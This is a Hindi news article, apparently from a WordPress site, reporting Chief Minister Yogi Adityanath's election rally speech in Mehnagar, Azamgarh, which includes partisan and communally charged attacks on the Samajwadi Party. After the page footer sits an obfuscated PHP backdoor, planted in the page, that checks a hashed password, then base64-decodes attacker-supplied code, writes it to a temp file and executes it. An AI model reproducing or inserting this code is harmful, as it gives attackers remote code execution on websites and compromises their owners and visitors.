Uncategorized

मेहनगर में योगी ने ललकारा, कहा-अयोध्या में राम आज विराज रहे हैं तो गुंडों माफियाओं की राम नाम सत्य है की शानदार यात्रा भी निकल रही है, बाकी बचे खुचों को चुनाव के बाद देखेंगे, पूरा चुनाव राम भक्तों व राम द्रोहियों के बीच सिमटा

 

मेहनगर में योगी ने ललकारा, कहा-अयोध्या में राम आज विराज रहे हैं तो गुंडों माफियाओं की राम नाम सत्य है की शानदार यात्रा भी निकल रही है, बाकी बचे खुचों को चुनाव के बाद देखेंगे, पूरा चुनाव राम भक्तों व राम द्रोहियों के बीच सिमटा

जिले के आजमगढ़ लोकसभा के मेंहनगर विधानसभा के घिनहापुर में मुख्यमंत्री सीएम योगी आदित्यनाथ की जनसभा हुई। सीएम ने विपक्षियों खास कर समाजवादी पार्टी को जमकर ललकारा और कहा कि चार चरण के चुनव संपन्न हो गया है। पांचवा कल संपन्न होगा और छठे चरण में आजमगढ़ की जनता जर्नादन को भी अपना प्रतिनिधि चुनना है तो। चार चरणो के चुनाव के परिणाम व रूझान इस बात को बताते है कि विपक्ष के अंदर मची खलबली बौखलाहट, उनकी हार को स्पष्ट प्रर्दर्शित करता है। पूरे देश के अंदर एक आवाज आ रही है एक ही भाव सर्वत्र दिखाई दे रहा है वह है फिर एक बार मोदी सरकार । अबकी बार चार सौ पार। चार सौ पार की बात होती है तो कांग्रेस, सपा और बसपा की हालत खराब होती है। उनके चेहरे की हवा उड़ जाती है। फिर पूछते है चार सौ पार कैसे होगा। तो जनता की ओर से आवाज आती है जो राम को लाए है हम उनको लाएंगे। सीएम योगी ने कहा कि यह चुनाव राम भक्तों और रामद्रोहियों के बीच में जाकर सिमट गया है। जिन लोगों ने आपके सामने पहचान का संकट खड़ा किया था जिन्होने राष्ट की सुरक्षा में सेंध लगाई, जिन्होने हमारे आराध्य देवों को अपवित्र करने का कुत्सीक प्रयास किया था। जिन लोगों ने विकास को बाधित किया था। उनको जबाव देने का सर्वोत्तम माध्यम है। आजमगढ में इसलिए आया हूं कि निरहुआ ने मात्र दो वर्ष के अंदर आजमगढ़ की तस्वीर और तकदीर बदलने के लिए पूरा प्रयास किया जो यहां दिखाई भी देता है। आजमगढ में फोर लेन व टू लेन की कनेक्टविटी है आजमगढ में महाराजा सुहेलदेव के नाम पर विश्वविद्यालय भ ीबन गया है संगीत महाविद्यालय का निर्माण हो रहा है, एयरपोर्ट का निर्माण हो गया है और अब आजमगढ़ को शव और अविश्वास की नजरों से नहीं देखते। बल्कि आजमगढ़ की पहचान भोजपुरी के सुपर स्टार निरहुआ के संसदीय क्षेत्र के रूप में होते है।

सीएम योगी ने कहा कि आप पूरे देश में कही चले जाइए लेकिन अगर कोई सपा का नेता होगा तो उसे शव की निगाह से हर कोई देखता है। तो लोग यह मान लेते है यह शरिफ तो नहीं होगा, ये जरूर कोई गुंडा, बदमाश होगा, सपा का समर्थक और कुछ और है तो लोग उसकी तलाशी लेना शुरू कर देते है कि कहीं कुछ गडबडड़ करने आया होगा। लेकिन निरहुआ ने आजमगढ़ की तस्वीर को सरकार के साथ मिलकर बदलने का प्रयास किया। जिसका परिणाम है कि आज यहां के लेगों को शक की निगाह से नही ंदेखा जाता। सीएम योगी ने कहा कि दो वर्षो के अंदर जितना अच्छा काम करने का प्रयास निरहुआ ने किया उतना कोई जनप्रतिनिधि नहीं कर सकता।

सीएम ने कहा कि आज देष की तस्वीर और तकदीर को पीएम मोदी ने बदलकर रख दिया है। आज दुनिया के अंदर के सम्मान मिल रहा है। भारत के अंदर सुरक्षा की कोई समस्या नहीं है। पहले देश के अंदर कोई आतंकी घटना घटित होती थी तो नाम आजमगढ के रानी सराय, कहीं संजरपुर का कहीं किसी अन्य क्षेत्र का । आजमगढ़ बदनाम हो चुका था।

सीएम ने कहा कि अब तो पटाखा भी तेज फूट जाता है तो पाकिस्तान पहले सफाई देता है और कहता है कि नहीं, नहीं ये मैंने नहीं किया मेरा नहीं है वो तो पटाखा है। क्योकि पाकिस्तान को मालूम है कि यह नया भारत है छेड़ता नहीं लेकिन अगर कोई छेड़ता है तो उसको छोड़ता भी नहीं है।

सीएम योगी ने कहा कि एक तरफ सुरक्षा, देश का सम्मान है तो दूसरी तरफ विकास के बड़े कार्य भी हुए है। सीएम ने कहा कि सपा सरकार के समय खाद्यान्न घोटाला होता था, गरीब भूख से मरता था, गरीब चिकित्सा के अभाव में दम तोड़ता था गरीब के पास मकान नहीं था, किसान आत्महत्या करता था। नौजवान पलायन करता था और चारो ओर अव्यस्था और अराजकता थी दंगा शुरू हो जाता था। पर्व व त्योहार आने पर कर्फ्यू लग जाता था। कोई कमाकर बेचारा लाता था तो रास्ते में छीन या लूट लिया जाता था।

सीएम योगी ने कहा कि गरीब को पांच किलो राशन फ्री में मिल रहा है 80 करोड़ लोग देश में मुफ्त राशन का लाभ ले रहे है। सीएम ने कहा कि अगर कोई आज के दिन में कोई पाकिस्तान का राग अलाप रहा है तो उसको कृपा करके पाकिस्तान ही चला जाना चाहिए, हिन्दुस्तान पर वह बोझा न बने। क्योकि पीएम 80 करोड़ लोगों को फ्री में राशन की सुविधा दे रहे है और पाकिस्तान में 23 करोड़ की कुल आबादी वह भी भूखों मर रही है।

सीएम ने कहा कि आज अयोध्या कैसे चमक रही है। सीएम ने उपस्थित जनसमुदाय से पूछा कि पहले और अब में अंतर है न। सीएम ने कहा कि पहले रामभक्तों पर गोली चलती थी अब रामभक्तों की आवाभगत कैसे होता है आपने देखा होगा। लाखों की संख्या में लोग आ रहे है सम्मान के साथ लोग दर्शन कर रहे है। पहले सपा की सरकार के समय उन आतंकवादियों के मुकदमे वापस लिए जाते थे। जिन आतंकवादियों रामजन्म भूमि पर आतंकी हमला किया था। लेकिन हमारे समय में अगर रामलला विराजमान हो रहे है तो आतंकवादियों की राम नाम की सत्य यात्रा ही तो निकल रही है ।

सीएम योगी ने कहा कि अभी आजमगढ़ को बहुत कुछ देना है। आजमगढ को औद्योगिक सिटी बनानी है। पीमए मोदी के नेतृत्व में आज विकास जिस तेजी के साथ आगे बढ़ रहा है । कभी ऐसी स्थिति पैदा करनी है कि जो आजमगढ़ का हमारा नौजवान मुंबई, कलकत्ता, बैगलूरू, हैदराबाद कमाने गया है वह वहा जाना न पड़े बल्कि हम यहीं उद्योग लगाकर काम यही देगें। और आजमगढ़ का हमारा नौजवान देश और दुनिया में नौकरी देने की स्थित में आ सके। इसलिए निरहुआ यहां के लिए आवश्यक है।

सीएम योगी ने कहा कि समाजवादी के लोग आज आएं है और कल जब यहां से चुनाव बाद जायेगे न तो आपको पहचानेगें भी नहीं । क्योकि वो तो बड़े लोग है। पिकनिक मनाने चले आए है। चुनाव बाद कोई इग्लैंड घुमेगा तो कोई कूल्लू मनाली तो कहीं कोई और जगह भागेगा। उससे आपको क्या लेना देना है। चुनाव में आ गए पिकनिक मनाने के लिए । उनको विकास से भी कुछ लेना देना नहीं है। क्योकि सपा की सरकार के समय में जितनी लूट खसोट करनी थी कर चुके। अब तो उसको निकालने की बारी आ रही है। इसलिए आजमगढ को एक बार घेराबंदी करने का प्रयास करेगें सब, लेकिन आप बचके रहना थोड़ा। अपने बीच के निरहुआ को चुनाव जीताकर भेजिए।

Related Articles

Leave a Reply

Your email address will not be published. Required fields are marked *

Back to top button
×

Powered by WhatsApp Chat

×
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}